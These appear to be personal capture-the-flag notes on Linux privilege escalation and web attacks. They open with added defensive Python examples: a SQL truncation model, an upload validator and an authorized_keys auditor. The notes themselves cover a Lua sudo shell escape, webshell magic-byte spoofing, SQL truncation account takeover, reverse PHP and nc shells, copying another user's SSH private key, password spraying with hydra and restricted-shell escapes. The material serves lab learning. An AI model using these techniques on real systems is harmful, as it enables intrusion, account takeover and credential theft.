<html> <head> <meta http-equiv=Content-Type content="text/html; charset=windows-1252"> <meta name=Generator content="Microsoft Word 15 (filtered)"> <style> <!-- /* Font Definitions */ @font-face {font-family:Wingdings; panose-1:5 0 0 0 0 0 0 0 0 0;} @font-face {font-family:"Cambria Math"; panose-1:2 4 5 3 5 4 6 3 2 4;} @font-face {font-family:Calibri; panose-1:2 15 5 2 2 2 4 3 2 4;} /* Style Definitions */ p.MsoNormal, li.MsoNormal, div.MsoNormal {margin-top:0cm; margin-right:0cm; margin-bottom:8.0pt; margin-left:0cm; line-height:107%; font-size:11.0pt; font-family:"Calibri",sans-serif;} p.MsoListParagraph, li.MsoListParagraph, div.MsoListParagraph {margin-top:0cm; margin-right:0cm; margin-bottom:8.0pt; margin-left:36.0pt; line-height:107%; font-size:11.0pt; font-family:"Calibri",sans-serif;} p.MsoListParagraphCxSpFirst, li.MsoListParagraphCxSpFirst, div.MsoListParagraphCxSpFirst {margin-top:0cm; margin-right:0cm; margin-bottom:0cm; margin-left:36.0pt; line-height:107%; font-size:11.0pt; font-family:"Calibri",sans-serif;} p.MsoListParagraphCxSpMiddle, li.MsoListParagraphCxSpMiddle, div.MsoListParagraphCxSpMiddle {margin-top:0cm; margin-right:0cm; margin-bottom:0cm; margin-left:36.0pt; line-height:107%; font-size:11.0pt; font-family:"Calibri",sans-serif;} p.MsoListParagraphCxSpLast, li.MsoListParagraphCxSpLast, div.MsoListParagraphCxSpLast {margin-top:0cm; margin-right:0cm; margin-bottom:8.0pt; margin-left:36.0pt; line-height:107%; font-size:11.0pt; font-family:"Calibri",sans-serif;} .MsoPapDefault {margin-bottom:8.0pt; line-height:107%;} @page WordSection1 {size:595.3pt 841.9pt; margin:72.0pt 72.0pt 72.0pt 72.0pt;} div.WordSection1 {page:WordSection1;} /* List Definitions */ ol {margin-bottom:0cm;} ul {margin-bottom:0cm;} --> </style> </head> <body lang=EN-GB style='word-wrap:break-word'> <div class=WordSection1> <p class=MsoListParagraph><b><span style='font-size:24.0pt;line-height:107%'>Scenarios – taken from CTF challenges</span></b></p> 
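<p class=MsoNormal>For the SQL Truncation scenario below, here is an added example (not from these notes) that models the MySQL truncation and trailing-space behaviour the trick relies on and shows the registration check that defeats it; the column width, table rows and email values are constructed for the demo.</p>

```python
# Added example, not from the original notes: models the MySQL behaviour the
# truncation trick depends on, and the registration check that defeats it.
# Constructed assumptions: VARCHAR(20) email column, strict mode off so an
# oversize INSERT is silently cut, PAD SPACE collation so '=' ignores
# trailing spaces (the documented behaviour the notes refer to).
MAX_LEN = 20

def mysql_store(value: str) -> str:
    """INSERT into VARCHAR(MAX_LEN) with strict mode off: silent truncation."""
    return value[:MAX_LEN]

def mysql_equal(a: str, b: str) -> bool:
    """'=' under a PAD SPACE collation: trailing spaces are not significant."""
    return a.rstrip(" ") == b.rstrip(" ")

def find_user(rows, email):
    """SELECT * FROM users WHERE email = ? as MySQL would evaluate it."""
    return [r for r in rows if mysql_equal(r[0], email)]

def register_vulnerable(rows, email, password):
    # The duplicate check runs on the raw input, which the trailing 'test'
    # keeps distinct; the column then truncates it down to the admin's email.
    if find_user(rows, email):
        return False
    rows.append((mysql_store(email), password))
    return True

def register_hardened(rows, email, password):
    # Validate before the database can normalise anything: hard length limit,
    # no surrounding or embedded whitespace, duplicate check on the stored form.
    if len(email) > MAX_LEN or email != email.strip() or " " in email:
        return False
    if find_user(rows, email):
        return False
    rows.append((email, password))
    return True

def login(rows, email, password):
    """True if any row matching the email (MySQL style) has this password."""
    return any(p == password for _, p in find_user(rows, email))

def demo(register):
    """Returns (registration accepted, attacker password works for admin)."""
    rows = [("admin@abc.abc", "s3cret")]           # constructed existing admin
    padded = "admin@abc.abc" + " " * 7 + "test"    # 24 chars, over the limit
    accepted = register(rows, padded, "attacker-pw")
    return accepted, login(rows, "admin@abc.abc", "attacker-pw")
```

demo(register_vulnerable) returns (True, True): the padded registration is accepted and the new password then logs in as admin; demo(register_hardened) returns (False, False).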
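<p class=MsoNormal>For the Magic bytes scenario below, an added example (not from these notes) of the server-side upload check that a JPEG header glued onto a .php.jpg does not get past; the allow-list, marker strings, sample bytes and stored-name scheme are constructed.</p>

```python
# Added example, not from the original notes: a server-side upload check that a
# JPEG header glued onto a .php.jpg does not get past. The allow-list, marker
# strings, sample bytes and stored-name scheme are constructed for the demo.
import secrets

# final extension -> magic bytes the file body must begin with
ALLOWED = {".jpg": b"\xff\xd8\xff", ".jpeg": b"\xff\xd8\xff",
           ".png": b"\x89PNG\r\n\x1a\n"}
SCRIPT_EXTS = {".php", ".phtml", ".phar", ".php5"}
SCRIPT_MARKERS = (b"<?php", b"<?=", b"<script")  # heuristic, not a full parser

# constructed samples: the header from the notes (FFD8FFDB) plus image data,
# and the same header followed by PHP
GOOD_JPG = b"\xff\xd8\xff\xdb" + b"\x00" * 32
HEADER_PLUS_PHP = b"\xff\xd8\xff\xdb" + b"<?php echo 'hello'; ?>"

def check_upload(filename: str, data: bytes):
    """Return (ok, reason); ok is True only when every check passes."""
    parts = filename.lower().split(".")
    if len(parts) < 2:
        return False, "no extension"
    exts = ["." + p for p in parts[1:]]
    # 1. the final extension must be on the allow-list
    if exts[-1] not in ALLOWED:
        return False, "extension not allowed"
    # 2. no script extension anywhere in the name (abc.php.jpg)
    if any(e in SCRIPT_EXTS for e in exts):
        return False, "script extension inside filename"
    # 3. the magic bytes must match the claimed type
    if not data.startswith(ALLOWED[exts[-1]]):
        return False, "magic bytes do not match extension"
    # 4. a valid header followed by PHP is still a webshell: scan the body
    if any(m in data for m in SCRIPT_MARKERS):
        return False, "script content inside image"
    return True, "ok"

def stored_name(filename: str) -> str:
    """Call only after check_upload passed: never keep the client's name,
    use a random name plus the validated final extension."""
    ext = "." + filename.lower().rsplit(".", 1)[-1]
    return secrets.token_hex(16) + ext
```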
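<p class=MsoNormal>For the Authorized keys scenario below, an added example (not from these notes) that audits an authorized_keys file for entries whose trailing comment names a different user than the account they grant access to; the sample file is constructed and the key blobs are placeholders.</p>

```python
# Added example, not from the original notes: audits an authorized_keys file so
# that an entry whose trailing comment names a different user than the account
# it grants access to is flagged. SAMPLE is constructed; the key blobs are
# placeholders, not real keys.
import re

KEY_TYPE_PREFIXES = ("ssh-", "ecdsa-sha2-", "sk-")

def parse_authorized_keys(text):
    """Yield (key_type, comment, has_options) per key line; skip blanks/comments.
    Option values are not parsed; the key-type token is located by prefix so a
    quoted option containing a space does not shift the comment."""
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        tokens = line.split()
        idx = next((i for i, t in enumerate(tokens)
                    if t.startswith(KEY_TYPE_PREFIXES)), None)
        if idx is None or idx + 1 >= len(tokens):
            continue  # no key type or no key blob: malformed, ignore
        comment = " ".join(tokens[idx + 2:])
        yield tokens[idx], comment, idx > 0

def comment_user(comment):
    """Return the 'user' part of a 'user@host' comment, or None."""
    m = re.match(r"^([A-Za-z0-9._-]+)@", comment)
    return m.group(1) if m else None

def audit(account, text):
    """Entries in account's authorized_keys whose comment names someone else."""
    findings = []
    for key_type, comment, _ in parse_authorized_keys(text):
        owner = comment_user(comment)
        if owner is not None and owner != account:
            findings.append((key_type, comment))
    return findings

SAMPLE = """# constructed sample of /home/userA/.ssh/authorized_keys
ssh-ed25519 AAAAC3NzaC1lZDI1NTE5PLACEHOLDERNOTAREALKEY userA@workstation
command="/usr/bin/uptime" ssh-rsa AAAAB3NzaC1yc2EPLACEHOLDERNOTAREALKEY userB@workstation
"""
```

audit("userA", SAMPLE) returns the ssh-rsa entry commented userB@workstation, which is exactly the mismatch the notes describe.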
<hr>
<p><a href="winscen.html" style="display:block; background-color:blue; width:100px; padding:20px; font-size:30px; color:white; text-decoration:none;">Windows Priv Esc Scenarios</a></p>
<hr>
<p class=MsoNormal><b><span style='font-size:26.0pt;line-height:107%; background:olive'>#### Deleted file by admin</span></b></p>
<p class=MsoNormal><span style='font-size:14.0pt;line-height:107%'>.bash_history reveals a file which has now been deleted (sudo -u sysadmin /home/syadmin/luvit privesc.ua)</span></p>
<p class=MsoNormal><span style='font-size:14.0pt;line-height:107%'>sudo -l reveals we can run certain software as root which executes Lua code</span></p>
<p class=MsoNormal><span style='font-size:14.0pt;line-height:107%'>echo "require('os');" > priv.lua</span></p>
<p class=MsoNormal><span style='font-size:14.0pt;line-height:107%'>echo "os.execute('/bin/bash');" >> priv.lua</span></p>
<p class=MsoNormal><b><span style='font-size:26.0pt;line-height:107%; background:lime'>#### uploading tool to server</span></b></p>
<p class=MsoNormal><span style='font-size:14.0pt;line-height:107%'>sudo mv pspy64 /var/www/html</span></p>
<p class=MsoNormal><span style='font-size:14.0pt;line-height:107%'>sudo service apache2 start</span></p>
<p class=MsoNormal><b><span style='font-size:26.0pt;line-height:107%; color:white;background:purple'>#### backgrounding a shell</span></b></p>
<p class=MsoNormal><span style='font-size:14.0pt;line-height:107%'>you can create a shell and use &amp; to background it during an SSH session. This prevents other users from being blocked.</span></p>
<p class=MsoNormal><b><span style='font-size:26.0pt;line-height:107%; color:white;background:navy'>#### Magic bytes</span></b></p>
<p class=MsoNormal><span style='font-size:14.0pt;line-height:107%'>you attempt to upload a file abc.php.jpg</span></p>
<p class=MsoNormal><span style='font-size:14.0pt;line-height:107%'>- it gets flagged up immediately</span></p>
<p class=MsoNormal><span style='font-size:14.0pt;line-height:107%'>way around it:</span></p>
<p class=MsoNormal><span style='font-size:14.0pt;line-height:107%'>get the magic bytes from a .jpg image (xxd image.jpg | head)</span></p>
<p class=MsoNormal><span style='font-size:14.0pt;line-height:107%'>add these to the start of our abc.php.jpg</span></p>
<p class=MsoNormal><span style='font-size:14.0pt;line-height:107%'>echo 'FFD8FFDB' | xxd -r -p > webshell.php.jpg</span></p>
<p class=MsoNormal><span style='font-size:14.0pt;line-height:107%'>then upload</span></p>
<p class=MsoNormal><b><span style='font-size:26.0pt;line-height:107%; background:aqua'>### SQL Truncation</span></b></p>
<p class=MsoNormal><span style='font-size:14.0pt;line-height:107%'>- a website states a username or email cannot be more than xyz in size</span></p>
<p class=MsoNormal><span style='font-size:14.0pt;line-height:107%'>- from burp, send a username longer than what is permitted</span></p>
<p class=MsoNormal><span style='font-size:14.0pt;line-height:107%'>- so we enter loads of spaces around admin and then url encode</span></p>
<p class=MsoNormal><span style='font-size:14.0pt;line-height:107%'>- this works because, according to the MySQL documentation, trailing spaces are ignored</span></p>
<p class=MsoNormal><span style='font-size:14.0pt;line-height:107%'>- so register an account using admin@test.abc then catch the request</span></p>
<p class=MsoNormal><span style='font-size:14.0pt;line-height:107%'>- so now if we have an email of admin: admin@abc.abc, add in many spaces after it (admin@abc.abc++++++++++++++test)</span></p>
<p class=MsoNormal><b><span style='font-size:26.0pt;line-height:107%; color:white;background:teal'>#### Email changing to admin for priv</span></b></p>
<p class=MsoNormal><span style='font-size:14.0pt;line-height:107%;color:black'>CTF whereby the standard user could change the password of the admin by catching the request in Burp Suite and editing the user email to the admin's (which is found easily).</span></p>
<p class=MsoListParagraph style='text-indent:-18.0pt'><span style='font-size:14.0pt;line-height:107%;color:black'>- Then when you go to the profile of admin, view the source code and you find an images upload directory.</span></p>
<p class=MsoListParagraph style='text-indent:-18.0pt'><span style='font-size:14.0pt;line-height:107%;color:black'>- So you go back to the profile, upload a reverse PHP shell (no indicator if uploaded or not)</span></p>
<p class=MsoNormal><span style='font-size:14.0pt;line-height:107%;color:black'>then back in the browser, type in the /directory of image uploads followed by the reverse shell (ensure the listener is on) – may need to use curl</span></p>
<p class=MsoListParagraphCxSpLast style='text-indent:-18.0pt'><span style='font-size:14.0pt;line-height:107%;color:black'>- Then, using the /sbin/reboot privilege, we reboot using that .sh file</span></p>
<h1><b><span style='background:yellow'>###### Source code</span></b></h1>
<p class=MsoNormal>even on directories found, look at the source code!! and run curl on them all</p>
<p class=MsoNormal>website: directory fuzz only gave one link (sec config clue)</p>
<p class=MsoNormal>use curl -L and look at the source</p>
<h1><b><span style='background:lime'>##### steghide extract issue</span></b></h1>
<p class=MsoNormal>tried to extract using steghide extract -sf filename.jpg - it would not work</p>
<p class=MsoNormal>however when I write to another file it worked!</p>
<p class=MsoNormal>steghide extract -sf filename.jpg -xf hash.txt</p>
<h1><b><span style='background:silver'>##### Authorized keys</span></b></h1>
<p class=MsoNormal>if you come across authorized keys for userA but in the key file it shows userB at the end,</p>
<p class=MsoNormal>you can log in as userA using the private key of userB</p>
<p class=MsoNormal>we take the private key of userB and put it onto our attacking machine, then we use that to log in as userA</p>
<p class=MsoNormal>ssh userA@xx.xx.xx.xx -i .ssh/id_rsa_userB</p>
<p class=MsoNormal>copy to our system:</p>
<p class=MsoNormal>scp USERB@192.168.124.230:~/.ssh/id_rsa .</p>
<h1><b><span style='color:white;background:maroon'>##### Enum’d everything, so cannot find way in</span></b></h1>
<p class=MsoNormal>do a directory scan with extensions set, i.e. -x .php</p>
<p class=MsoNormal>(use dirsearch) - /web-content/big.txt -e .php</p>
<h1><b><span style='color:white;background:navy'>##### Config file for lateral movement</span></b></h1>
<p class=MsoNormal>when doing a box, if you find a user and still need to do lateral movement,</p>
<p class=MsoNormal>go to /etc/phpmyadmin and look for the config file</p>
<h1><b><span style='background:aqua'>##### DB/PHP passwords, user lists</span></b></h1>
<p class=MsoNormal>if you find db passwords or php passwords, create a user list (from the home directories) and run that single password against the user list in hydra</p>
<h1><b><span style='background:red'>#### Upload perm to smb share / cron job in management (box DAWN)</span></b></h1>
<p class=MsoNormal>you have management.log, which shows a cron job</p>
<p class=MsoNormal>eg: chmod 777 /home/dawn/ITDEPT/product-control</p>
<p class=MsoNormal>you have upload access to the smb share</p>
<p class=MsoNormal>create an nc one-liner reverse shell, insert it into product-control and upload</p>
<h1><b><span style='background:fuchsia'>#### Unshadowed</span></b></h1>
<p class=MsoNormal>when we unshadow passwd and shadow, the password hash is displayed; use this to crack further</p>
<h1><b><span style='background:teal'>##### Restricted shell</span></b></h1>
<p class=MsoNormal>type export in the cmd</p>
<p class=MsoNormal>is /bin writeable?</p>
<p class=MsoNormal>ls -la /usr/bin (or /bin)</p>
<p class=MsoNormal>look for writeable by all</p>
<p class=MsoNormal><b><span style='font-size:18.0pt;line-height:107%'>method 2:</span></b></p>
<p class=MsoNormal>ssh in using: -t "bash --noprofile"</p>
<p class=MsoNormal>then you need to use absolute paths - cat = /usr/bin/cat &lt;file&gt;</p>
<p class=MsoNormal><b><span style='font-size:18.0pt;line-height:107%'>method 3:</span></b></p>
<p class=MsoNormal>export PATH="$PATH:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin"</p>
<h1><b><span style='color:white;background:purple'>##### Making a file called update in /tmp executable</span></b></h1>
<p class=MsoNormal>just echo a shell into it.</p>
<p class=MsoNormal>may need to use the full path for nc (if used)</p>
<p class=MsoNormal>this is what enabled me to run chmod finally:</p>
<p class=MsoNormal>export PATH="$PATH:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin"</p>
<h1><b><span style='background:olive'>#### Command injection using |</span></b></h1>
<p class=MsoNormal>command injection found, cannot view /etc/passwd</p>
<p class=MsoNormal>used burp suite</p>
<p class=MsoNormal>BUT reverse shells would not work,</p>
<p class=MsoNormal>command injection using | gives a cleaner output</p>
<p class=MsoNormal>enter the reverse shell as found (no url encoding or anything) after the |</p>
<p class=MsoNormal>- another thing: the website is on port 80, so you need to get a reverse connection to port 80</p>
<h1><b><span style='background:lime'>#### Rabbit hole!</span></b></h1>
<p class=MsoNormal>easyboxfun</p>
<p class=MsoNormal>kept concentrating on /gym instead of doing a scan on the main URL</p>
<h1><b><span style='background:aqua'>##### Reverse shell escaping issues (wpwpn box)</span></b></h1>
<p class=MsoNormal>we were trying to run a reverse shell using the command <code>system ' '</code>; the python reverse shell obviously contained "" and '' so it doubled the amount of '' in use; using \ before the '' enabled the reverse shell to connect</p>
</div> </body> </html>